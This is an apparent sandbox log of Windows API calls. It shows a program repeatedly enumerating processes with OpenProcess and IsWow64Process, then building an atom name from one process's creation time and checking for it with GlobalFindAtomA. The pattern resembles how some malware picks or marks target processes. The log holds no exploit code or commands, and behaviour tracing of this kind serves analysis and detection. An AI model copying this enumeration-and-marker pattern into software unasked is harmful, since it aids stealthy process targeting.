	[0098.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x36c
	[0098.890] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.890] CloseHandle (hObject=0x36c) returned 1
	[0098.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x36c
	[0098.891] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.891] CloseHandle (hObject=0x36c) returned 1
	[0098.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x36c
	[0098.891] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.891] CloseHandle (hObject=0x36c) returned 1
	[0098.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x36c
	[0098.891] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.891] CloseHandle (hObject=0x36c) returned 1
	[0098.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x36c
	[0098.892] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.892] CloseHandle (hObject=0x36c) returned 1
	[0098.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x36c
	[0098.892] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.892] CloseHandle (hObject=0x36c) returned 1
	[0098.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x36c
	[0098.892] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.892] CloseHandle (hObject=0x36c) returned 1
	[0098.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x36c
	[0098.892] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.892] CloseHandle (hObject=0x36c) returned 1
	[0098.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x36c
	[0098.893] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.893] CloseHandle (hObject=0x36c) returned 1
	[0098.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x36c
	[0098.893] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.893] CloseHandle (hObject=0x36c) returned 1
	[0098.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x36c
	[0098.893] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.893] CloseHandle (hObject=0x36c) returned 1
	[0098.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x36c
	[0098.893] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.893] CloseHandle (hObject=0x36c) returned 1
	[0098.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x36c
	[0098.893] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.893] CloseHandle (hObject=0x36c) returned 1
	[0098.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x36c
	[0098.894] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.894] CloseHandle (hObject=0x36c) returned 1
	[0098.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x36c
	[0098.894] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.894] CloseHandle (hObject=0x36c) returned 1
	[0098.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x36c
	[0098.894] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.894] CloseHandle (hObject=0x36c) returned 1
	[0098.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x36c
	[0098.894] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.894] CloseHandle (hObject=0x36c) returned 1
	[0098.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x36c
	[0098.894] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.894] CloseHandle (hObject=0x36c) returned 1
	[0098.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x36c
	[0098.895] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.895] CloseHandle (hObject=0x36c) returned 1
	[0098.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x36c
	[0098.895] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.895] CloseHandle (hObject=0x36c) returned 1
	[0098.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x36c
	[0098.895] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.895] CloseHandle (hObject=0x36c) returned 1
	[0098.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x36c
	[0098.895] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.895] CloseHandle (hObject=0x36c) returned 1
	[0098.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x36c
	[0098.895] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.895] CloseHandle (hObject=0x36c) returned 1
	[0098.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x36c
	[0098.896] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.896] CloseHandle (hObject=0x36c) returned 1
	[0098.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x36c
	[0098.896] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.896] CloseHandle (hObject=0x36c) returned 1
	[0098.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x36c
	[0098.896] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.896] CloseHandle (hObject=0x36c) returned 1
	[0098.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x36c
	[0098.896] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.896] CloseHandle (hObject=0x36c) returned 1
	[0098.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x36c
	[0098.896] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.896] CloseHandle (hObject=0x36c) returned 1
	[0098.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x36c
	[0098.897] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.897] CloseHandle (hObject=0x36c) returned 1
	[0098.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x36c
	[0098.897] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.897] CloseHandle (hObject=0x36c) returned 1
	[0098.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0098.897] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.897] CloseHandle (hObject=0x36c) returned 1
	[0098.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0098.897] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.898] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.898] GetProcessTimes (in: hProcess=0x36c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.898] wsprintfA (in: param_1=0x677298, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.898] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.898] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.898] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.898] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.899] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.899] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.899] CloseHandle (hObject=0x36c) returned 1
	[0098.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x36c
	[0098.899] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.899] CloseHandle (hObject=0x36c) returned 1
	[0098.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x36c
	[0098.899] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.899] CloseHandle (hObject=0x36c) returned 1
	[0098.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x36c
	[0098.942] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.942] CloseHandle (hObject=0x36c) returned 1
	[0098.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x36c
	[0098.943] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.943] CloseHandle (hObject=0x36c) returned 1
	[0098.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x36c
	[0098.943] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.943] CloseHandle (hObject=0x36c) returned 1
	[0098.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x36c
	[0098.944] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.944] CloseHandle (hObject=0x36c) returned 1
	[0098.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x36c
	[0098.944] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.944] CloseHandle (hObject=0x36c) returned 1
	[0098.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x36c
	[0098.944] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.944] CloseHandle (hObject=0x36c) returned 1
	[0098.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x36c
	[0098.944] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.944] CloseHandle (hObject=0x36c) returned 1
	[0098.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x36c
	[0098.944] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.944] CloseHandle (hObject=0x36c) returned 1
	[0098.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x36c
	[0098.945] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.945] CloseHandle (hObject=0x36c) returned 1
	[0098.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x36c
	[0098.945] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.945] CloseHandle (hObject=0x36c) returned 1
	[0098.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x36c
	[0098.946] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.946] CloseHandle (hObject=0x36c) returned 1
	[0098.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x36c
	[0098.946] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.946] CloseHandle (hObject=0x36c) returned 1
	[0098.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x36c
	[0098.946] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.946] CloseHandle (hObject=0x36c) returned 1
	[0098.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x36c
	[0098.946] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.946] CloseHandle (hObject=0x36c) returned 1
	[0098.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x36c
	[0098.947] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.947] CloseHandle (hObject=0x36c) returned 1
	[0098.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x36c
	[0098.947] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.947] CloseHandle (hObject=0x36c) returned 1
	[0098.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x36c
	[0098.947] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.947] CloseHandle (hObject=0x36c) returned 1
	[0098.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x36c
	[0098.947] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.947] CloseHandle (hObject=0x36c) returned 1
	[0098.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x36c
	[0098.947] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.947] CloseHandle (hObject=0x36c) returned 1
	[0098.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x36c
	[0098.948] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.948] CloseHandle (hObject=0x36c) returned 1
	[0098.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x36c
	[0098.948] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.948] CloseHandle (hObject=0x36c) returned 1
	[0098.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x36c
	[0098.948] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.948] CloseHandle (hObject=0x36c) returned 1
	[0098.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x36c
	[0098.948] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.948] CloseHandle (hObject=0x36c) returned 1
	[0098.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x36c
	[0098.948] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.948] CloseHandle (hObject=0x36c) returned 1
	[0098.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x36c
	[0098.949] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.949] CloseHandle (hObject=0x36c) returned 1
	[0098.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x36c
	[0098.949] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.949] CloseHandle (hObject=0x36c) returned 1
	[0098.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x36c
	[0098.949] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.949] CloseHandle (hObject=0x36c) returned 1
	[0098.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x36c
	[0098.949] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.949] CloseHandle (hObject=0x36c) returned 1
	[0098.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x36c
	[0098.949] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.949] CloseHandle (hObject=0x36c) returned 1
	[0098.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x36c
	[0098.950] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.950] CloseHandle (hObject=0x36c) returned 1
	[0098.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0098.950] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.950] CloseHandle (hObject=0x36c) returned 1
	[0098.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0098.950] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.950] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.951] GetProcessTimes (in: hProcess=0x36c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.951] wsprintfA (in: param_1=0x677298, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.951] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.951] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.951] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.951] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.951] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.951] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.951] CloseHandle (hObject=0x36c) returned 1
	[0098.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x36c
	[0098.952] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.952] CloseHandle (hObject=0x36c) returned 1
	[0098.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x36c
	[0098.952] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.952] CloseHandle (hObject=0x36c) returned 1
	[0099.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x36c
